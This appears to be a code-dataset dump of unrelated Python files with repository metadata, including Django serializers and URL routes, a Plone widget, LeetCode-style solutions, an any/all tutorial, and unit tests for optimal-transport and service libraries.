5fc4d9930b0cd1e115f8c6ebf51cd9e28922d263
|
refs/heads/master
| 2020-09-01T07:55:45.362457 | 2019-11-01T04:55:48 | 2019-11-01T04:55:48 | 218,913,913 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,025 |
py
|
from drf_haystack.serializers import HaystackSerializer
from rest_framework import serializers
from goods.models import GoodsCategory, GoodsChannel, SKU
from goods.search_indexes import SKUIndex
class CategorySerializer(serializers.ModelSerializer):
"""类别序列化器"""
class Meta:
model = GoodsCategory
fields = ('id','name')
class ChannelSerializer(serializers.ModelSerializer):
"""频道序列化器"""
category = CategorySerializer
class Meta:
model = GoodsChannel
fields = ('category','url')
class SKUSerializer(serializers.ModelSerializer):
"""
序列化器输出商品sku信息
"""
class Meta:
# 输出:序列化字段
model = SKU
fields = ('id','name','price','default_image_url','comments')
class SKUIndexSerializer(HaystackSerializer):
"""SKU索引结果数据序列化器"""
class Meta:
index_classes = [SKUIndex]
fields = ('text', 'id', 'name', 'price', 'default_image_url', 'comments')
|
[
"[email protected]"
] | |
1979d64a1540d510194a1064ab3dd19ceaa3585b
|
b511bcf3b3c8724a321caa95f381956f56c81197
|
/collective/wpadmin/widgets/draft.py
|
c1c4dd4bfba27029e4bbf9f9d56d38ede2eb8eca
|
[] |
no_license
|
toutpt/collective.wpadmin
|
6957f8fadd5f62a12e4b5cd3eb40794874712cea
|
b5f2384ff2421f1529f7f844d75c1cb4073ac959
|
refs/heads/master
| 2016-08-05T00:30:36.097097 | 2013-01-18T10:37:26 | 2013-01-18T10:37:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 755 |
py
|
from zope import component
from plone import api
from plone.registry.interfaces import IRegistry
from collective.wpadmin.widgets import widget
from collective.wpadmin import i18n
_ = i18n.messageFactory
class Draft(widget.Widget):
name = "draft"
title = _(u"Draft")
content_template_name = "draft.pt"
def get_drafts(self):
registry = component.getUtility(IRegistry)
key = 'collective.wpadmin.settings.WPAdminSettings.blog_type'
post_type = registry.get(key, 'News Item')
query = self.get_query()
query['review_state'] = 'private'
query['Creator'] = api.user.get_current().getId()
query['portal_type'] = post_type
brains = self.query_catalog(query)
return brains
|
[
"[email protected]"
] | |
00766e298a33dcae5f92d7859cc87d876ccca112
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2463/60782/304860.py
|
a0914fcd8b479f7c6f75f9999f2477a83b960f6a
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,154 |
py
|
"""
题目描述
给定一个已按照升序排列 的有序数组,找到两个数使得它们相加之和等于目标数。
函数应该返回这两个下标值 index1 和 index2,其中 index1 必须小于 index2。
说明:
返回的下标值(index1 和 index2)不是从零开始的。
你可以假设每个输入只对应唯一的答案,而且你不可以重复使用相同的元素。
"""
class Solution(object):
def twoSum(self, numbers, target):
"""
:type numbers: List[int]
:type target: int
:rtype: List[int]
"""
dic = {}
li = []
for i in range(len(numbers)):
if numbers[i] in dic.keys():
# 将原始值和差值的下标分别添加到li中
li.append(dic[numbers[i]] + 1) # 原始值的下标
li.append(i + 1) # 差值的下标
return li
# 将每个值的差值及对应的下标, 保存在字典中
dic[target - numbers[i]] = i
return None
s = Solution()
print(s.twoSum(list(map(int, input().split(", "))), int(input())))
|
[
"[email protected]"
] | |
a9003fdff24c89d3d9fa50bcfc64c24a0cc79586
|
a24a03163cf643249922edc29bc2086517615e53
|
/thewema/urls.py
|
7bcf11a899a1294d7c8cbb12dff05605f0faab60
|
[] |
no_license
|
ErickMwazonga/The-Wema-Academy
|
165203e8e337459f6bae4f7178b3bfad715f052a
|
61f9b778e423326d8dbd2c04f2dd6ce19e15e2a9
|
refs/heads/master
| 2021-01-19T14:22:00.568982 | 2017-04-13T10:41:06 | 2017-04-13T10:41:06 | 88,153,833 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,004 |
py
|
"""wema URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from . import views
from django.contrib.auth import views as auth_views
from django.contrib.auth.forms import AuthenticationForm
app_name = 'thewema'
urlpatterns = [
# url(r'^$', views.index_view, name='index'),
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^students$', views.StudentListView.as_view(), name='students'),
url(r'^student$', views.StudentCreateView.as_view(), name='student'),
url(r'^student/(?P<pk>[0-9]+)/$', views.StudentDetailView.as_view(), name='student_detail'),
url(r'^class$', views.StudentClassCreateView.as_view(), name='sclass'),
url(r'^classes$', views.StudentClassListView.as_view(), name='classes'),
url(r'^exam$', views.ExamCreateView.as_view(), name='exam'),
url(r'^score$', views.ScoreCreateView.as_view(), name='score'),
url(r'^scores$', views.ScoreListView.as_view(), name='scores'),
url(r'^scores/(?P<pk>[0-9]+)/$', views.ScoreDetailView.as_view(), name='score_detail'),
url(r'^feedback$', views.FeedbackCreateView.as_view(), name='feedback'),
url(r'^login$', auth_views.login, {
'template_name': 'thewema/login.html',
'authentication_form': AuthenticationForm
},
name='login'
),
url(r'^logout/$', auth_views.logout_then_login, {'login_url': 'thewema:login'}, name='logout'),
]
|
[
"[email protected]"
] | |
bd0ba877cb6b849000ce9ea154a7506ab94dbb97
|
2d735cd72f1b2a17e58397a1214d3bcc2b8f113f
|
/PYTHON_FUNCTIONS/any_all_in_python.py
|
c4e84d22e60c5fd4da0ce9f654e5655dd7651839
|
[] |
no_license
|
shubhamrocks888/python
|
3b95b5b53be8e0857efe72b8797e01e959d230f4
|
7313ddd0d09a0b478df928a07a6094930b597132
|
refs/heads/master
| 2022-12-15T00:03:40.261942 | 2020-08-29T18:00:42 | 2020-08-29T18:00:42 | 279,280,400 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,812 |
py
|
Truth table :-
any all
All true values True True
All false values False False
One True(all others are False) True False
One False(all others are True) True False
Empty False True
##Any and All are two built ins provided in python used for successive And/Or.
'''Any'''
Returns true if any of the items is True. It returns False if empty or all are false.
Any can be thought of as a sequence of OR operations on the provided iterables.
It short circuit the execution i.e. stop the execution as soon as the result is known.
Syntax : any(list of iterables)
# Since all are false, false is returned
print (any([False, False, False, False])) # Output: False
# Here the method will short-circuit at the
# second item (True) and will return True.
print (any([False, True, False, False])) # Output: True
# Here the method will short-circuit at the
# first (True) and will return True.
print (any([True, False, False, False])) # Output: True
'''All'''
Returns true if all of the items are True (or if the iterable is empty). All can be thought
of as a sequence of AND operations on the provided iterables. It also short circuit the
execution i.e. stop the execution as soon as the result is known.
Syntax : all(list of iterables)
# Here all the iterables are True so all
# will return True and the same will be printed
print (all([True, True, True, True])) # Output: True
# Here the method will short-circuit at the
# first item (False) and will return False.
print (all([False, True, True, False])) # Output: False
# This statement will return False, as no
# True is found in the iterables
print (all([False, False, False])) # Output: False
Practical Examples:
# This code explains how can we
# use 'any' function on list
list1 = []
list2 = []
# Index ranges from 1 to 10 to multiply
for i in range(1,11):
list1.append(4*i)
# Index to access the list2 is from 0 to 9
for i in range(0,10):
list2.append(list1[i]%5==0)
print('See whether at least one number is divisible by 5 in list 1=>')
print(any(list2))
Output:
See whether at least one number is divisible by 5 in list 1=>
True
# Illustration of 'all' function in python 3
# Take two lists
list1=[]
list2=[]
# All numbers in list1 are in form: 4*i-3
for i in range(1,21):
list1.append(4*i-3)
# list2 stores info of odd numbers in list1
for i in range(0,20):
list2.append(list1[i]%2==1)
print('See whether all numbers in list1 are odd =>')
print(all(list2))
Output:
See whether all numbers in list1 are odd =>
True
|
[
"[email protected]"
] | |
c22f8acacd79b8afcf53558dbd03b826832af27a
|
8580fd92512c236deae692d155bdb5eab2e00508
|
/DarkTrails/asgi.py
|
7b723533039a12cf02182a7076964bb2881d83f3
|
[] |
no_license
|
JackSnowdon/DownDT
|
d5d7f04acf92b5102cf67c5aa70cda2ebc4062fd
|
17924b0b64da39d29c892fee4c7746d09b76fd8c
|
refs/heads/master
| 2023-04-01T00:25:16.382696 | 2021-03-28T16:19:26 | 2021-03-28T16:19:26 | 352,373,320 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
"""
ASGI config for DarkTrails project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DarkTrails.settings')
application = get_asgi_application()
|
[
"[email protected]"
] | |
8b23a3fffb6859b0622210f0f50699c660b3ef3f
|
50ee2f4f1a7d2e5ff7ac35118c5ac45f9b923865
|
/0x01-python-if_else_loops_functions/1-last_digit.py
|
c7b28ae9d733661962aa47ddbb2e987589ebc1b4
|
[] |
no_license
|
spencerhcheng/holbertonschool-higher_level_programming
|
b489fbe8eba6109ef1eaa0d9363f3477e7eb16c4
|
f8e1dbc24fcf8fb40ca135d2700872eb773e481e
|
refs/heads/master
| 2021-01-20T06:54:35.044899 | 2018-05-20T05:09:59 | 2018-05-20T05:09:59 | 89,943,332 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 380 |
py
|
#!/usr/bin/python3
import random
number = random.randint(-10000, 10000)
if number > 0:
lastNum = number % 10
elif number <= 0:
lastNum = number % -10
print('Last digit of {:d} is {:d}'. format(number, lastNum), end=" ")
if lastNum > 5:
print('and is greater than 5')
elif lastNum == 0:
print('and is 0')
elif lastNum < 6:
print('and is less than 6 and not 0')
|
[
"[email protected]"
] | |
6aaadd38872c563c7e3b4fd9a31a6d2edfb79945
|
41b73ecc4fa00a58609c1c3b8e717bbbc13cdee6
|
/test/test_all.py
|
d7bd3837fc94c5de55e932b9801ad5547ef409f3
|
[] |
no_license
|
ahwillia/sinkdiv
|
70c2f689af43cf80dd8c3951199885f3792d9ac3
|
85bd51f369855b78e5c0e1d5bb2aa8928d85c428
|
refs/heads/master
| 2023-01-31T10:56:08.481608 | 2020-12-18T04:41:26 | 2020-12-18T04:41:26 | 298,928,192 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,364 |
py
|
import pytest
import numpy as np
from numpy.testing import assert_allclose
from sinkdiv import OTCost, ForwardKL, Balanced
from scipy.optimize import approx_fprime
def test_entropy_increases(make_fig=False):
"""
Check that increasing epsilon increases blur in the
transport plan.
"""
epsilons = (0.01, 0.1, 1.0)
margdiv = ForwardKL(1.0)
x = np.linspace(-4, 4, 51)[:, None]
y = np.linspace(-4, 4, 50)[:, None]
a = np.squeeze(np.exp(-x ** 2))
b = np.squeeze(np.exp(-y ** 2))
a /= np.sum(a)
b /= np.sum(b)
# Fit transport plans.
plans = []
for eps in epsilons:
plans.append(
OTCost(margdiv, eps, 1e-6).fit(a, x, b, y).P_
)
# Test that the entropy of the optimal plan increases.
entropies = [np.sum(-P * np.log(P + 1e-10) - P + 1) for P in plans]
assert np.all(np.diff(entropies) > 0)
if make_fig:
import matplotlib.pyplot as plt
fig, axes = plt.subplots(1, 3, sharey=True, sharex=True)
for P, eps, ax in zip(plans, epsilons, axes):
ax.imshow(P, aspect="auto")
ax.set_title("eps = {}".format(eps))
fig.set_size_inches((4, 2))
fig.tight_layout()
plt.show()
# @pytest.mark.parametrize('eps', [0.01, 0.1, 1.0])
# @pytest.mark.parametrize('tol', [1e-6])
# def test_balanced_duality_gap(eps, tol):
# """
# Check agreement between primal and dual objectives,
# balanced transport case.
# """
# np.random.seed(1234)
# margdiv = Balanced()
# x = np.linspace(-4, 4, 51)[:, None]
# y = np.linspace(-4, 4, 50)[:, None]
# a = np.squeeze(np.exp(-x ** 2))
# b = np.squeeze(np.exp(-y ** 2))
# a /= a.sum()
# b /= b.sum()
# ot = OTCost(margdiv, eps, tol).fit(a, x, b, y)
# assert_allclose(ot.primal_obj_, ot.dual_obj_, atol=1e-3)
@pytest.mark.parametrize('seed', [123])
@pytest.mark.parametrize('eps', [1.0])
@pytest.mark.parametrize('lam', [1000]) # <-- !! currently works for large lam, but not small !!
@pytest.mark.parametrize('b_mass', [1.0])
@pytest.mark.parametrize('tol', [1e-6])
def test_reference_implementation(seed, eps, lam, b_mass, tol):
"""
Compare transport plan to Python Optimal Transpot (POT)
library.
"""
from ot.unbalanced import sinkhorn_stabilized_unbalanced
rs = np.random.RandomState(seed)
# Random locations for atoms.
x = rs.randn(25, 1)
y = rs.randn(24, 1)
# Random mass vectors.
a = np.random.rand(x.size)
b = np.random.rand(y.size)
# Normalize masses.
a *= (1.0 / a.sum())
b *= (b_mass / b.sum())
# Fit OTCost, get transport plan
margdiv = ForwardKL(lam)
otcost = OTCost(margdiv, eps, tol).fit(a, x, b, y)
# Fit with reference library.
transport_plan = sinkhorn_stabilized_unbalanced(
a, b, otcost.C_, eps, lam, numItermax=10000
)
# Assert optimal transport plans match.
assert_allclose(otcost.P_, transport_plan, atol=1e-5, rtol=1e-2)
@pytest.mark.parametrize('seed', [123])
@pytest.mark.parametrize('tol', [1e-6])
@pytest.mark.parametrize('eps', [1e-6])
def test_zero_cost(seed, eps, tol):
"""
Assert cost is zero if epsilon and lambda penalties are both very small.
In this case, an optimal transport plan could just be the zeros matrix.
"""
rs = np.random.RandomState(seed)
# Random locations for atoms.
x = rs.randn(25, 1)
y = rs.randn(24, 1)
# Random mass vectors.
a = np.random.rand(x.size)
b = np.random.rand(y.size)
# Normalize masses.
a *= (1.0 / a.sum())
b *= (1.0 / b.sum())
# Fit model with very small marginal penalty
margdiv = ForwardKL(1e-6)
otcost = OTCost(margdiv, eps, tol).fit(a, x, b, y)
# Assert cost is essentially zero.
assert_allclose(otcost.primal_obj_, 0.0, atol=1e-5)
assert_allclose(otcost.dual_obj_, 0.0, atol=1e-5)
@pytest.mark.parametrize('seed', [123])
@pytest.mark.parametrize('eps', [0.1, 1.0, 10])
@pytest.mark.parametrize('lam', [0.1, 1.0, 10])
@pytest.mark.parametrize('b_mass', [0.5, 1.0, 2.0])
@pytest.mark.parametrize('tol', [1e-6])
def test_unbalanced_kl_duality_gap(seed, eps, lam, b_mass, tol):
"""
Compare transport plan to Python Optimal Transpot (POT)
library.
"""
rs = np.random.RandomState(seed)
# Random locations for atoms.
x = rs.randn(25, 1)
y = rs.randn(24, 1)
# Random mass vectors.
a = np.random.rand(x.size)
b = np.random.rand(y.size)
# Normalize masses.
a *= (1.0 / a.sum())
b *= (b_mass / b.sum())
# Calculate OT cost.
margdiv = ForwardKL(lam)
otcost = OTCost(margdiv, eps, tol).fit(a, x, b, y)
# Duality gap should be small.
assert_allclose(otcost.primal_obj_, otcost.dual_obj_, atol=1e-4)
@pytest.mark.parametrize('seed', [123, 1234])
@pytest.mark.parametrize('eps', [0.1, 1.0, 10])
@pytest.mark.parametrize('lam', [0.1, 1.0, 10])
@pytest.mark.parametrize('b_mass', [0.5, 1.0, 2.0])
@pytest.mark.parametrize('tol', [1e-6])
def test_ot_kl_gradients(seed, eps, lam, b_mass, tol):
"""
Compare transport plan to Python Optimal Transpot (POT)
library.
"""
rs = np.random.RandomState(seed)
# Random locations for atoms.
x = rs.randn(25, 1)
y = rs.randn(24, 1)
# Random mass vectors.
a = np.random.rand(x.size)
b = np.random.rand(y.size)
# Normalize masses.
a *= (1.0 / a.sum())
b *= (b_mass / b.sum())
# Calculate OT cost.
margdiv = ForwardKL(lam)
otcost = OTCost(margdiv, eps, tol)
# Fit OT cost, compute gradients for a and b.
otcost.fit(a, x, b, y)
grad_a = otcost.grad_a_.copy()
grad_b = otcost.grad_b_.copy()
# Compute gradient of a by finite differencing.
def f(a_):
otcost.fit(a_, x, b, y)
return otcost.primal_obj_
approx_grad_a = approx_fprime(a, f, np.sqrt(np.finfo(float).eps))
# Check gradients approximately match finite differencing.
assert_allclose(grad_a, approx_grad_a, atol=1e-4, rtol=1e-3)
# Function to compute otcost given mass vector b.
def g(b_):
otcost.fit(a, x, b_, y)
return otcost.primal_obj_
approx_grad_b = approx_fprime(b, g, np.sqrt(np.finfo(float).eps))
# Check gradients approximately match finite differencing.
assert_allclose(grad_b, approx_grad_b, atol=1e-4, rtol=1e-3)
|
[
"[email protected]"
] | |
6aca78d446a771d1bdc8bb31bbbc2bb778bacfba
|
206c10808b6224f7d8236e27cc555e723af695d9
|
/tests/test_empty_service.py
|
8ab14bce925b0271890c48c84c359ad361d40e51
|
[
"MIT"
] |
permissive
|
xdmiodz/tomodachi
|
3280209ae49100ec902e3b15c323b38e7480cdd3
|
7ca998a421dd724df5967d5baa0cf79f5112b79b
|
refs/heads/master
| 2023-03-15T19:22:16.381212 | 2023-01-20T07:34:48 | 2023-01-20T07:34:48 | 200,020,833 | 0 | 2 |
MIT
| 2023-03-08T00:00:01 | 2019-08-01T09:30:22 |
Python
|
UTF-8
|
Python
| false | false | 674 |
py
|
from typing import Any
from run_test_service_helper import start_service
def test_empty_service(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/empty_service.py", monkeypatch)
loop.run_until_complete(future)
out, err = capsys.readouterr()
assert "No transports defined in service file" in err
def test_non_decorated_service(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/non_decorated_service.py", monkeypatch)
loop.run_until_complete(future)
out, err = capsys.readouterr()
assert "No transports defined in service file" in err
|
[
"[email protected]"
] | |
cfb9ff1a1089622084ea929a8ceebf87da9d0687
|
45799ccc3a16c785ab3c65f3296d66f8463590dc
|
/docs/_downloads/b9951f29cd54bc08237c8fb75b9c2476/q1314.py
|
b487939c8e11b9a0513ff9639257664f5e82d07a
|
[
"MIT"
] |
permissive
|
odys-z/hello
|
9d29b7af68ea8c490b43994cf16d75c0e8ace08e
|
fedd0aec7273f3170aa77316d0d5f317cc18a979
|
refs/heads/master
| 2023-08-19T03:25:58.684050 | 2023-08-18T08:07:27 | 2023-08-18T08:07:27 | 154,006,292 | 0 | 0 |
MIT
| 2023-04-18T22:50:56 | 2018-10-21T12:34:12 |
C++
|
UTF-8
|
Python
| false | false | 2,347 |
py
|
'''
1314. Matrix Block Sum
https://leetcode.com/problems/matrix-block-sum/
Given a m * n matrix mat and an integer K, return a matrix answer where each answer[i][j] is
the sum of all elements mat[r][c] for i - K <= r <= i + K, j - K <= c <= j + K, and (r, c)
is a valid position in the matrix.
Example 1:
Input: mat = [[1,2,3],[4,5,6],[7,8,9]], K = 1
Output: [[12,21,16],[27,45,33],[24,39,28]]
Example 2:
Input: mat = [[1,2,3],[4,5,6],[7,8,9]], K = 2
Output: [[45,45,45],[45,45,45],[45,45,45]]
Constraints:
m == mat.length
n == mat[i].length
1 <= m, n, K <= 100
1 <= mat[i][j] <= 100
Hint 1:
How to calculate the required sum for a cell (i,j) fast ?
Hint 2:
Use the concept of cumulative sum array.
Hint 3:
Create a cumulative sum matrix where dp[i][j] is the sum of all cells in the rectangle
from (0,0) to (i,j), use inclusion-exclusion idea.
'''
from unittest import TestCase
from typing import List
class Solution:
'''
70.85%
'''
def matrixBlockSum(self, mat: List[List[int]], K: int) -> List[List[int]]:
# dp
m, n = len(mat), len(mat[0])
dp = [[0] * (n+K) for _ in range(m+K)]
for r in range(m):
dp[r][0] = mat[r][0]
for c in range(1, n+K):
if c < n:
dp[r][c] = mat[r][c] + dp[r][c-1]
else:
dp[r][c] = dp[r][c-1]
for c in range(n+K):
for r in range(1, m+K):
if r < m:
dp[r][c] += dp[r-1][c]
else:
dp[r][c] = dp[r-1][c]
for r in range(m):
for c in range(n):
mat[r][c] = dp[r+K][c+K]
if 0 <= r - K - 1:
mat[r][c] -= dp[r-K-1][c+K]
if 0 <= c - K - 1:
mat[r][c] -= dp[r+K][c-K-1]
if 0 <= r - K - 1 and 0 <= c - K - 1:
mat[r][c] += dp[r-K-1][c-K-1]
return mat
if __name__ == '__main__':
t = TestCase()
s = Solution()
t.assertCountEqual([[12,21,16],[27,45,33],[24,39,28]],
s.matrixBlockSum([[1,2,3],[4,5,6],[7,8,9]], 1))
t.assertCountEqual([[45,45,45],[45,45,45],[45,45,45]],
s.matrixBlockSum([[1,2,3],[4,5,6],[7,8,9]], 2))
print("OK!")
|
[
"[email protected]"
] | |
17fe19b4e80f15be0aa96d6afc0197167630396f
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/Yfksxs7kyJf6B3yvK_21.py
|
3d96e93dc0ddaedcb2d4e9ec9ecf8a4618a5d7cd
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,234 |
py
|
"""
Given a list of integers, return the smallest _positive_ integer _not present
in the list_.
Here is a representative example. Consider the list:
[-2, 6, 4, 5, 7, -1, 7, 1, 3, 6, 6, -2, 9, 10, 2, 2]
After reordering, the list becomes:
[-2, -2, -1, 1, 2, 2, 3, 4, 5, 6, 6, 6, 7, 7, 9, 10]
... from which we see that the smallest missing positive integer is `8`.
### Examples
min_miss_pos([-2, 6, 4, 5, 7, -1, 1, 3, 6, -2, 9, 10, 2, 2]) ➞ 8
# After sorting, list becomes [-2, -2, -1, 1, 2, 2, 3, 4, 5, 6, 6, 7, 9, 10]
# So the smallest missing positive integer is 8
min_miss_pos([5, 9, -2, 0, 1, 3, 9, 3, 8, 9]) ➞ 2
# After sorting, list becomes [-2, 0, 1, 3, 3, 5, 8, 9, 9, 9]
# So the smallest missing positive integer is 2
min_miss_pos([0, 4, 4, -1, 9, 4, 5, 2, 10, 7, 6, 3, 10, 9]) ➞ 1
# After sorting, list becomes [-1, 0, 2, 3, 4, 4, 4, 5, 6, 7, 9, 9, 10, 10]
# So the smallest missing positive integer is 1
### Notes
For the sake of clarity, recall that `0` is not considered to be a positive
number.
"""
def min_miss_pos(lst):
for i in range(1, 2<<64): # huge range instead of "while" or itertools.count
if i not in lst:
return i
|
[
"[email protected]"
] | |
ce23796651ea87049745a818cb08caafa35cc580
|
9eef3e4cf39a659268694cf08a4a799af8fb13e2
|
/packages/dpdprops/dpdprops/__init__.py
|
c42c51871769928dd028add49df137aafa25b487
|
[] |
no_license
|
cselab/tRBC-UQ
|
c30ec370939b949c989d2e9cd30137073b53e7d2
|
cd7711b76c76e86bc6382914111f4fa42aa78f2c
|
refs/heads/master
| 2023-04-18T03:06:49.175259 | 2022-10-25T15:45:07 | 2022-10-25T15:45:07 | 483,407,531 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 954 |
py
|
from .fluid import *
from .dpdparams import (DPDParams,
create_dpd_params_from_str,
create_dpd_params_from_Re_Ma,
create_dpd_params_from_props)
from .membrane import *
from .membraneparams import (MembraneParams,
KantorParams,
JuelicherParams,
WLCParams,
LimParams,
DefaultRBCParams,
KantorWLCRBCDefaultParams,
JuelicherLimRBCDefaultParams)
from .membraneforces import (extract_dihedrals,
compute_kantor_energy,
compute_juelicher_energy)
from .fsi import (get_gamma_fsi_DPD_membrane,
create_fsi_dpd_params)
from .rbcmesh import (load_stress_free_mesh,
load_equilibrium_mesh)
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.